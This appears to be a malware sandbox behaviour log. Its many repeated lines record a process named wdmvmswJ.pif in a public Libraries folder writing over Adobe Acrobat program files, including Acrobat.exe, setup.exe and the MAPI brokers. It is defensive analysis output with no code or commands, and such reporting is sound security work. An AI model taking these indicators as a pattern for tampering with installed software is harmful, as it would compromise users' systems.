Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe Jump to behavior
Source: C:\Users\Public\Libraries\wdmvmswJ.pif File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe Jump to behavior
